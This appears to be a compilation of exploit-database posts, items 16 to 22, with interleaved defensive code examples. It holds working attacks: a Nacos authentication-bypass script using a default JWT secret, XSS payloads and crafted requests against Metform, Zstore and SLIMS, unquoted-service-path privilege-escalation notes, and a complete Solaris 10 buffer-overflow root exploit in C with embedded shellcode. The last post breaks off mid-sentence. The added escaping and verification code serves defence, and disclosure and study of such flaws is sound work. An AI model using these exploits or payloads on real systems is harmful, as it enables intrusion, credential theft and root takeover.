Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://0day.today/ https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
16. # Exploit Title: Metform Elementor Contact Form Builder v3.1.2 - Unauthenticated Stored Cross-Site Scripting (XSS)
# Google Dork: inurl:metform-form intext:textarea|message
# Date: 14/01/2023
# Exploit Author: Mohammed Chemouri (https://de.linkedin.com/in/chemouri)
# Vendor Homepage: https://wpmet.com/plugin/metform/
# Software Link: https://downloads.wordpress.org/plugin/metform.3.1.2.zip
# Version: <= 3.1.2
# Tested on: WordPress version 6.1.1, PHP version 8.0.27 (64bit)
# CVE : CVE-2023-0084

Description:
An unauthenticated attacker can insert persistent malicious JavaScript code via the text-area field, and because the input is not properly sanitized the XSS will be executed each time the victim visits the affected post. An attacker can steal the admin's session or credentials, e.g. using a phishing attack (display a fake login page), and may install a JavaScript backdoor like the Browser Exploitation Framework (BeEF), etc.

Reproduction Steps:
1- Create a new form (using MetForm Elementor widgets), insert a text-area field and a submit button, then publish the form.
2- Visit the created form (no login needed), insert the following JavaScript code in the text-area and submit:
<script>alert(0)</script>
3- By visiting MetForm, then Entries, from the WP-ADMIN panel and viewing the inserted post, the XSS payload will be executed.

Because there may be bots scanning the web and trying to brute-force admin credentials or exploit known vulnerabilities, this flaw can also be automated to steal credentials, perform actions on behalf of the logged-in user, or even install a JavaScript worm like the Browser Exploitation Framework (BeEF) and put more than 100,000 websites at high risk.

Remediation:
All fields must be properly sanitized and escaped before being displayed in the browser. WordPress already offers an API for this purpose.
For more information please refer to:
https://developer.wordpress.org/apis/security/common-vulnerabilities/
https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
17. # Exploit Title: Nacos 2.0.3 - Access Control vulnerability
# Date: 2023-01-17
# Exploit Author: Jenson Zhao
# Vendor Homepage: https://nacos.io/
# Software Link: https://github.com/alibaba/nacos/releases/
# Version: Up to (including) 2.0.3
# Tested on: Windows 10
# CVE : CVE-2021-43116
# Required before execution: pip install PyJWT,requests

import argparse
import base64
import requests
import time
import json
from jwt.algorithms import has_crypto, requires_cryptography
from jwt.utils import base64url_encode, force_bytes
from jwt import PyJWS


class MyPyJWS(PyJWS):
    def encode(self,
               payload,            # type: Union[Dict, bytes]
               key,                # type: str
               algorithm='HS256',  # type: str
               headers=None,       # type: Optional[Dict]
               json_encoder=None   # type: Optional[Callable]
               ):
        segments = []

        if algorithm is None:
            algorithm = 'none'

        if algorithm not in self._valid_algs:
            pass

        # Header
        header = {'alg': algorithm}

        if headers:
            self._validate_headers(headers)
            header.update(headers)

        json_header = force_bytes(
            json.dumps(
                header,
                separators=(',', ':'),
                cls=json_encoder
            )
        )

        segments.append(base64url_encode(json_header))
        segments.append(base64url_encode(payload))

        # Segments
        signing_input = b'.'.join(segments)

        try:
            alg_obj = self._algorithms[algorithm]
            key = alg_obj.prepare_key(key)
            signature = alg_obj.sign(signing_input, key)

        except KeyError:
            if not has_crypto and algorithm in requires_cryptography:
                raise NotImplementedError(
                    "Algorithm '%s' could not be found. Do you have cryptography "
                    "installed?" % algorithm
                )
            else:
                raise NotImplementedError('Algorithm not supported')

        segments.append(base64url_encode(signature))

        return b'.'.join(segments)


def JwtGenerate():
    Secret = 'SecretKey01234567890123456789012345678901234567890123456789012345678'
    payload = json.dumps(
        {
            "sub": "nacos",
            "exp": int(time.time()) + 3600
        },
        separators=(',', ':')
    ).encode('utf-8')
    encoded_jwt = MyPyJWS().encode(payload, base64.urlsafe_b64decode(Secret), algorithm='HS256')
    return encoded_jwt.decode()


def check(url, https, token):
    if https:
        r = requests.get(
            url='https://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=',
            verify=False)
    else:
        r = requests.get(
            url='http://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=')
    if r.status_code == 403:
        print("There is no CVE-2021-43116 problem with the url!")
    else:
        print("There is CVE-2021-43116 problem with the url!")


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", help="URL of the target. example: 192.168.1.1:8848")
    parser.add_argument("-s", "--https", help="Whether https is used. Default is false")
    args = parser.parse_args()
    url = args.target
    https = False
    if (args.https):
        https = args.https
    if url:
        check(url, https, JwtGenerate())
    else:
        print('Please enter URL!')
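The PoC above works only because the token signing key is a published default: anyone holding that key can mint an HS256 token the server will accept. The following added example (not Nacos code and not the PoC's; stdlib only, no PyJWT) shows the compact-JWS construction the PoC performs, the verification a server does, and the two checks a deployment reviewer wants: the token is rejected once the key is rotated, and the configured key can be compared against the known default. The alg header is pinned on verification so a forged token cannot downgrade to "none".

```python
import base64
import hashlib
import hmac
import json
import time

# Default signing key used by the PoC above (base64url-encoded as Nacos stores it).
NACOS_DEFAULT_SECRET_B64 = "SecretKey01234567890123456789012345678901234567890123456789012345678"


def default_key():
    return base64.urlsafe_b64decode(NACOS_DEFAULT_SECRET_B64)


def b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims, key):
    """Compact JWS as the PoC builds it: b64url(header).b64url(payload).b64url(HMAC-SHA256)."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = ("%s.%s" % (header, payload)).encode("ascii")
    signature = hmac.new(key, signing_input, hashlib.sha256).digest()
    return "%s.%s.%s" % (header, payload, b64url(signature))


def verify_hs256(token, key, now=None):
    """Return the claims if the token is HS256, signed with `key` and unexpired,
    otherwise None. Malformed input is treated as invalid, not as an error."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        signature = b64url_decode(s)
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":        # never let the token choose the algorithm
        return None
    expected = hmac.new(key, ("%s.%s" % (h, p)).encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    claims = json.loads(b64url_decode(p))
    now = time.time() if now is None else now
    if "exp" in claims and claims["exp"] <= now:
        return None
    return claims


def uses_default_secret(configured_secret_b64):
    """Deployment check: true when the configured token secret is still the public default."""
    return hmac.compare_digest(base64.urlsafe_b64decode(configured_secret_b64), default_key())


if __name__ == "__main__":
    token = sign_hs256({"sub": "nacos", "exp": int(time.time()) + 3600}, default_key())
    print(token)
    print("accepted with default key:", verify_hs256(token, default_key()) is not None)
    print("accepted after rotation  :", verify_hs256(token, b"rotated-secret") is not None)
```

Rotating the secret invalidates every token minted with the default, which is the actual fix; the 403 test in the PoC's check() is just the observable side of that.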
18. # Exploit Title: HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path
# Date: 2023/01/17
# Exploit Author : Wim Jaap van Vliet
# Vendor Homepage: www.clevo.com.tw
# Software Link: https://enstrong.blob.core.windows.net/en-driver/PDXXPNX1/Others/CC30_1006.zip
# Version: 2.1.0.6
# Tested on: Windows 11 Pro 10.0.22000

# Exploit
The Hotkey Clipboard Service 'HKClipSvc', installed as part of Control Center3.0 v3.97 (and earlier versions) by Clevo, has an unquoted service path. This software package is usually installed on Clevo laptops (or other brands using Clevo barebones) as a driver. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges on the system.

# Information
C:\>sc qc "HKClipSvc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: HKClipSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ControlCenter\Driver\x64\HKClipSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : HotKey Clipboard Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
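An unquoted image path with spaces is exploitable because CreateProcess tries each space-delimited prefix as an executable (appending .exe when the prefix has no extension) before it reaches the real binary. The following added example (not part of the post or of Clevo's software; the sc qc text is a constructed copy of the output above) extracts BINARY_PATH_NAME from sc qc output, decides whether the precondition holds, and lists, in load order, the files an attacker would have to plant and the directories they would need write access to.

```python
import re

# Constructed copy of the `sc qc` output shown above, used as sample input.
SC_QC_SAMPLE = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: HKClipSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ControlCenter\Driver\x64\HKClipSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : HotKey Clipboard Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def binary_path_from_sc_qc(text):
    """Pull BINARY_PATH_NAME out of `sc qc` output, or None if absent."""
    match = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", text)
    return match.group(1).strip() if match else None


def is_unquoted_with_spaces(image_path):
    """The precondition for the bug: no surrounding quotes and at least one space."""
    return not image_path.startswith('"') and " " in image_path


def hijack_candidates(image_path):
    """Files CreateProcess tries, in order, before reaching the real binary.
    Each space ends a candidate; a candidate whose last path component has
    no extension gets .exe appended, as the loader does."""
    if not is_unquoted_with_spaces(image_path):
        return []
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        cand = " ".join(tokens[:i])
        last_component = cand.rsplit("\\", 1)[-1]
        if "." not in last_component:
            cand += ".exe"
        candidates.append(cand)
    return candidates


def planting_directories(image_path):
    """Directories in which a rogue file would have to be planted, in order;
    check these with icacls for write access by unprivileged users, since
    that ACL, not the unquoted path alone, decides exploitability."""
    seen = []
    for cand in hijack_candidates(image_path)[:-1]:
        parent = cand.rsplit("\\", 1)[0] + "\\"
        if parent not in seen:
            seen.append(parent)
    return seen


if __name__ == "__main__":
    path = binary_path_from_sc_qc(SC_QC_SAMPLE)
    for cand in hijack_candidates(path):
        print(cand)
    print("directories to check:", planting_directories(path))
```

For the service above the candidates are C:\Program.exe and C:\Program Files.exe, so the only directory that matters is C:\; on a default install standard users cannot create files there, which is why the post says "could potentially".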
19. ## Exploit Title: Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS)
## Development: nu11secur1ty
## Date: 01.18.2023
## Vendor: https://zippy.com.ua/
## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4
## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4

## Description:
The value of manual insertion point 1 is copied into the HTML document as plain text between tags. The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in the manual insertion point 1. This input was echoed unmodified in the application's response.

## STATUS: HIGH Vulnerability

[+] Exploit:

```GET
GET /index.php?p=App%2fPages%2fChatgiflc%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a HTTP/2
Host: store.zippy.com.ua
Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```

## Proof and Exploit:
[href](https://streamable.com/tplz84)

## Reference:
[href](https://portswigger.net/web-security/cross-site-scripting/reflected)

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
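Posts 12, 16 and 19 above are the same bug in three products: a stored or reflected value is written into HTML without escaping, and the Metform remediation names the fix, escaping for the output context. The following added example (not code from any of those projects; the payloads are the PoC strings from the posts) renders a field the vulnerable way and the escaped way for two contexts, element content and an attribute value, and then parses the result the way a browser would to list what would execute. It generalizes slightly beyond the posts by covering the attribute context, where the quote characters must be escaped as well.

```python
import html
from html.parser import HTMLParser

# The PoC strings from posts 12, 16 and 19 above, used as constructed input.
STORED_PAYLOADS = [
    "<script>alert(document.cookie)</script>",
    "<script>alert(0)</script>",
    "giflc<img src=a onerror=alert(1)>c0yu0",
]


def render_cell_vulnerable(value):
    """What the affected pages do: the stored field lands in the HTML as-is."""
    return "<td>%s</td>" % value


def render_cell_safe(value):
    """Element-content context: escape &, <, > (and quotes) before output."""
    return "<td>%s</td>" % html.escape(value, quote=True)


def render_attr_safe(value):
    """Attribute context: the value must be quoted and quotes escaped, or a
    payload can close the attribute and add an event handler."""
    return '<input type="text" value="%s">' % html.escape(value, quote=True)


class ActiveContentFinder(HTMLParser):
    """Records what a browser would execute: <script> elements and on* attributes."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("script element")
        for name, _ in attrs:
            if name.lower().startswith("on"):
                self.hits.append("%s on <%s>" % (name, tag))


def active_content(markup):
    """Parse rendered HTML and return the executable constructs found."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.hits


if __name__ == "__main__":
    for payload in STORED_PAYLOADS:
        print("raw    :", active_content(render_cell_vulnerable(payload)))
        print("escaped:", active_content(render_cell_safe(payload)))
```

In WordPress the equivalents are esc_html() for element content and esc_attr() for attributes, as the remediation in post 16 points to; the parser-based check is what a unit test for an entries page can assert on.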
  20. /* * Exploit Title: Solaris 10 libXm - Buffer overflow Local privilege escalation * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE * Copyright (c) 2023 Marco Ivaldi <[email protected]> * * "What has been will be again, * what has been done will be done again; * there is nothing new under the Sun." * -- Ecclesiastes 1:9 * * #Solaris #CDE #0day #ForeverDay #WontFix * * This exploit illustrates yet another way to abuse the infamous dtprintinfo * binary distributed with the Common Desktop Environment (CDE), a veritable * treasure trove for bug hunters since the 1990s. It's not the most reliable * exploit I've ever written, but I'm quite proud of the new vulnerabilities * I've unearthed in dtprintinfo with the latest Solaris patches (CPU January * 2021) applied. The exploit chain is structured as follows: * 1. Inject a fake printer via the printer injection bug I found in lpstat. * 2. Exploit the stack-based buffer overflow I found in libXm ParseColors(). * 3. Enjoy root privileges! * * For additional details on my bug hunting journey and on the vulnerabilities * themselves, you can refer to the official advisory: * https://github.com/0xdea/advisories/blob/master/HNS-2022-01-dtprintinfo.txt * * Usage: * $ gcc raptor_dtprintlibXmas.c -o raptor_dtprintlibXmas -Wall * $ ./raptor_dtprintlibXmas 10.0.0.109:0 * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE * Copyright (c) 2023 Marco Ivaldi <[email protected]> * * Using SI_PLATFORM : i86pc (5.10) * Using stack base : 0x8047fff * Using safe address : 0x8045790 * Using rwx_mem address : 0xfeffa004 * Using sc address : 0x8047fb4 * Using sprintf() address : 0xfefd1250 * Path of target binary : /usr/dt/bin/dtprintinfo * * On your X11 server: * 1. Select the "fnord" printer, then click on "Selected" > "Properties". * 2. Click on "Find Set" and choose "/tmp/.dt/icons" from the drop-down menu. * * Back to your original shell: * # id * uid=0(root) gid=1(other) * * IMPORTANT NOTE. 
* The buffer overflow corrupts some critical variables in memory, which we * need to fix. In order to do so, we must patch the hostile buffer at some * fixed locations with the first argument of the last call to ParseColors(). * The easiest way to get such a safe address is via the special 0x41414141 * command-line argument and truss, as follows: * $ truss -fae -u libXm:: ./raptor_dtprintlibXmas 10.0.0.109:0 0x41414141 2>OUT * $ grep ParseColors OUT | tail -1 * 29181/1@1: -> libXm:ParseColors(0x8045770, 0x3, 0x1, 0x8045724) * ^^^^^^^^^ << this is the safe address we need * * Tested on: * SunOS 5.10 Generic_153154-01 i86pc i386 i86pc (CPU January 2021) * [previous Solaris versions are also likely vulnerable] */ #include <fcntl.h> #include <link.h> #include <procfs.h> #include <stdio.h> #include <stdlib.h> #include <strings.h> #include <unistd.h> #include <sys/stat.h> #include <sys/systeminfo.h> #define INFO1 "raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE" #define INFO2 "Copyright (c) 2023 Marco Ivaldi <[email protected]>" #define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program #define DEBUG "/tmp/XXXXXXXXXXXXXXXXXX" // target for debugging #define BUFSIZE 1106 // size of hostile buffer #define PADDING 1 // hostile buffer padding #define SAFE 0x08045770 // 1st arg to ParseColors() char sc[] = /* Solaris/x86 shellcode (8 + 8 + 8 + 27 = 51 bytes) */ /* triple setuid() */ "\x31\xc0\x50\x50\xb0\x17\xcd\x91" "\x31\xc0\x50\x50\xb0\x17\xcd\x91" "\x31\xc0\x50\x50\xb0\x17\xcd\x91" /* execve() */ "\x31\xc0\x50\x68/ksh\x68/bin" "\x89\xe3\x50\x53\x89\xe2\x50" "\x52\x53\xb0\x3b\x50\xcd\x91"; /* globals */ char *arg[2] = {"foo", NULL}; char *env[256]; int env_pos = 0, env_len = 0; /* prototypes */ int add_env(char *string); void check_bad(int addr, char *name); int get_env_addr(char *path, char **argv); int search_ldso(char *sym); int search_rwx_mem(void); void set_val(char *buf, int pos, int val); /* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], 
cmd[1024], *vuln = VULN; char platform[256], release[256], display[256]; int i, sc_addr, safe_addr = SAFE; FILE *fp; int sb = ((int)argv[0] | 0xfff); // stack base int ret = search_ldso("sprintf"); // sprintf() in ld.so.1 int rwx_mem = search_rwx_mem(); // rwx memory /* helper that prints argv[0] address, used by get_env_addr() */ if (!strcmp(argv[0], arg[0])) { printf("0x%p\n", argv[0]); exit(0); } /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* process command line */ if ((argc < 2) || (argc > 3)) { fprintf(stderr, "usage: %s xserver:display [safe_addr]\n\n", argv[0]); exit(1); } snprintf(display, sizeof(display), "DISPLAY=%s", argv[1]); if (argc > 2) { safe_addr = (int)strtoul(argv[2], (char **)NULL, 0); } /* enter debug mode */ if (safe_addr == 0x41414141) { unlink(DEBUG); snprintf(cmd, sizeof(cmd), "cp %s %s", VULN, DEBUG); if (system(cmd) == -1) { perror("error creating debug binary"); exit(1); } vuln = DEBUG; } /* fill envp while keeping padding */ add_env("LPDEST=fnord"); // injected printer add_env("HOME=/tmp"); // home directory add_env("PATH=/usr/bin:/bin"); // path sc_addr = add_env(display); // x11 display add_env(sc); // shellcode add_env(NULL); /* calculate shellcode address */ sc_addr += get_env_addr(vuln, argv); /* inject a fake printer */ unlink("/tmp/.printers"); unlink("/tmp/.printers.new"); if (!(fp = fopen("/tmp/.printers", "w"))) { perror("error injecting a fake printer"); exit(1); } fprintf(fp, "fnord :\n"); fclose(fp); link("/tmp/.printers", "/tmp/.printers.new"); /* craft the hostile buffer */ bzero(buf, sizeof(buf)); for (i = PADDING; i < BUFSIZE - 16; i += 4) { set_val(buf, i, ret); // sprintf() set_val(buf, i += 4, rwx_mem); // saved eip set_val(buf, i += 4, rwx_mem); // 1st arg set_val(buf, i += 4, sc_addr); // 2nd arg } memcpy(buf, "\"c c ", 5); // beginning of hostile buffer buf[912] = ' '; // string separator set_val(buf, 1037, safe_addr); // safe address set_val(buf, 1065, safe_addr); // safe address 
set_val(buf, 1073, 0xffffffff); // -1 /* create the hostile XPM icon files */ system("rm -fr /tmp/.dt"); mkdir("/tmp/.dt", 0755); mkdir("/tmp/.dt/icons", 0755); if (!(fp = fopen("/tmp/.dt/icons/fnord.m.pm", "w"))) { perror("error creating XPM icon files"); exit(1); } fprintf(fp, "/* XPM */\nstatic char *xpm[] = {\n\"8 8 3 1\",\n%s", buf); fclose(fp); link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.l.pm"); link("/tmp/.dt/icons/fnord.m.pm", "/tmp/.dt/icons/fnord.t.pm"); /* print some output */ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); sysinfo(SI_RELEASE, release, sizeof(release) - 1); fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); fprintf(stderr, "Using safe address\t: 0x%p\n", (void *)safe_addr); fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr); fprintf(stderr, "Using sprintf() address\t: 0x%p\n", (void *)ret); fprintf(stderr, "Path of target binary\t: %s\n\n", vuln); /* check for badchars */ check_bad(safe_addr, "safe address"); check_bad(rwx_mem, "rwx_mem address"); check_bad(sc_addr, "sc address"); check_bad(ret, "sprintf() address"); /* run the vulnerable program */ execve(vuln, arg, env); perror("execve"); exit(0); } /* * add_env(): add a variable to envp and pad if needed */ int add_env(char *string) { int i; /* null termination */ if (!string) { env[env_pos] = NULL; return env_len; } /* add the variable to envp */ env[env_pos] = string; env_len += strlen(string) + 1; env_pos++; /* pad envp using zeroes */ if ((strlen(string) + 1) % 4) for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { env[env_pos] = string + strlen(string); env_len++; } return env_len; } /* * check_bad(): check an address for the presence of badchars */ void check_bad(int addr, char *name) { int i, bad[] = {0x00, 0x09, 0x20}; // NUL, HT, SP for (i = 0; i < sizeof(bad) / sizeof(int); i++) { if 
(((addr & 0xff) == bad[i]) || ((addr & 0xff00) == bad[i]) || ((addr & 0xff0000) == bad[i]) || ((addr & 0xff000000) == bad[i])) { fprintf(stderr, "error: %s contains a badchar\n", name); exit(1); } } } /* * get_env_addr(): get environment address using a helper program */ int get_env_addr(char *path, char **argv) { char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; char hex[11]; int fd[2], addr; /* truncate program name at correct length and create a hard link */ prog[strlen(path)] = '\0'; unlink(prog); link(argv[0], prog); /* open pipe to read program output */ if (pipe(fd) == -1) { perror("pipe"); exit(1); } switch(fork()) { case -1: /* cannot fork */ perror("fork"); exit(1); case 0: /* child */ dup2(fd[1], 1); close(fd[0]); close(fd[1]); execve(prog, arg, env); perror("execve"); exit(1); default: /* parent */ close(fd[1]); read(fd[0], hex, sizeof(hex)); break; } /* check address */ if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) { fprintf(stderr, "error: cannot read address from helper\n"); exit(1); } return addr + strlen(arg[0]) + 1; } /* * search_ldso(): search for a symbol inside ld.so.1 */ int search_ldso(char *sym) { int addr; void *handle; Link_map *lm; /* open the executable object file */ if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { perror("dlopen"); exit(1); } /* get dynamic load information */ if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { perror("dlinfo"); exit(1); } /* search for the address of the symbol */ if ((addr = (int)dlsym(handle, sym)) == NULL) { fprintf(stderr, "sorry, function %s() not found\n", sym); exit(1); } /* close the executable object file */ dlclose(handle); return addr; } /* * search_rwx_mem(): search for an RWX memory segment valid for all * programs (typically, /usr/lib/ld.so.1) using the proc filesystem */ int search_rwx_mem(void) { int fd; char tmp[16]; prmap_t map; int addr = 0, addr_old; /* open the proc filesystem */ sprintf(tmp,"/proc/%d/map", (int)getpid()); if ((fd = open(tmp, 
O_RDONLY)) < 0) { fprintf(stderr, "can't open %s\n", tmp); exit(1); } /* search for the last RWX memory segment before stack (last - 1) */ while (read(fd, &map, sizeof(map))) if (map.pr_vaddr) if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { addr_old = addr; addr = map.pr_vaddr; } close(fd); /* add 4 to the exact address NUL bytes */ if (!(addr_old & 0xff)) addr_old |= 0x04; if (!(addr_old & 0xff00)) addr_old |= 0x0400; return addr_old; } /* * set_val(): copy a dword inside a buffer (little endian) */ void set_val(char *buf, int pos, int val) { buf[pos] = (val & 0x000000ff); buf[pos + 1] = (val & 0x0000ff00) >> 8; buf[pos + 2] = (val & 0x00ff0000) >> 16; buf[pos + 3] = (val & 0xff000000) >> 24; }
  21. ## Exploit Title: SLIMSV 9.5.2 - Cross-Site Scripting (XSS)
## Development: nu11secur1ty
## Date: 01.19.2023
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2

## Description:
The value of manual insertion `point 3` is copied into the HTML document as plain text between tags. The payload udz21<script>alert(1)</script>rk346 was submitted in manual insertion point 3. This input was echoed unmodified in the application's response. The attacker can trick the already logged-in user into visiting the exploit link that this attacker has created, and if this already logged-in user is not actually IT or admin, this will be the end of this system.

## STATUS: HIGH Vulnerability

[+] Exploit:

```
GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27 HTTP/1.1
Host: pwnedhost1.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1; SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4
Connection: close
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)

## Proof and Exploit:
[href](https://streamable.com/zd6e18)

## Reference:
[href](https://portswigger.net/web-security/cross-site-scripting)

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
  22. # Exploit Title: Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path
# Exploit Author: Laguin Benjamin (MONK-MODE)
# Discovery Date: 2023-19-01
# Vendor Homepage: https://personifyinc.com/
# Software Link: https://personifyinc.com/download/chromacam
# Tested Version: Chromacam-4.0.3.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 x64
# CVE: In progress

# Step to discover Unquoted Service Path:

```
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Personify Frame Transformer    PsyFrameGrabberService    C:\Program Files (x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe    Auto

C:\>sc qc "PsyFrameGrabberService"
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: PsyFrameGrabberService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Personify Frame Transformer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo
Host Name:                 DESKTOP-1000
OS Name:                   Microsoft Windows 10 Professionnel
OS Version:                10.0.19044 N/A build 19044
```

# Exploit
If an attacker had already compromised the system and the current user has the privileges to write in the
"C:\Program Files (x86)\"
"C:\Program Files (x86)\Personify"
